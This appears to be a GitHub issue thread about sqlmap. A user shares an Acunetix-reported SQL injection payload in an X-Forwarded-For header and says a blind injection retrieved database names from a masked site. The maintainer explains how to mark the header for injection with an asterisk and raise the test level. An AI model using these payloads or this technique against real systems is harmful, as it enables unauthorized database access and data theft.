Closed hastalamuerte closed 4 years ago
hastalamuerte
commented
4 years ago SQL query - SELECT database() informationschema and -1' OR 2+761-761-1=0+0+0+1 or '9Blrmidy'=' => TRUE
but sqlmap doesent see the payload in file.. (((( also it test two X-forwarded-for parametrs #1 and #2...
stamparm
commented
4 years ago 1) sqlmap doesn't like SQL injection payloads inside provided data. You are also being explicitly warned from sqlmap in case of your request file 2) It has to have access to the raw/valid data 3) In your case, that would be something like:
....
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: 1.2.3.4*
X-Requested-With: XMLHttpRequest
...Notice that I've explicitly used asterisk (*) to mark where sqlmap should start injection attempts
4) If you want to use OR payloads you'll need to upper the risk level (e.g. --level=3)
5) You payload looks frivolous, thus I am not sure that sqlmap is the biggest problem here
Hello i got a report from acunetix , its look like GET / HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 X-Forwarded-For: -1' OR 321=6 AND 000761=000761 or '9Blrmidy'=' Cookie: __ddg1=mBHvTbSQ4TC7RkTGcj9y;PHPSESSID=0hq5a7n7c84qli2gunnk6nv785 X-Requested-With: XMLHttpRequest Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip,deflate Host: **.com Connection: Keep-alive
I was put in a txt file and run with -r Sqlmap find only a blind sql injection with different payload in x-forwaded-for and yes its work - i get databases names .. How can i directly set the payload and parameter (its not a post so i think --data will not work . Or maybe can i teach sqlmap to use file infromation from txt files like that to get a fast and direct injection .
Thank you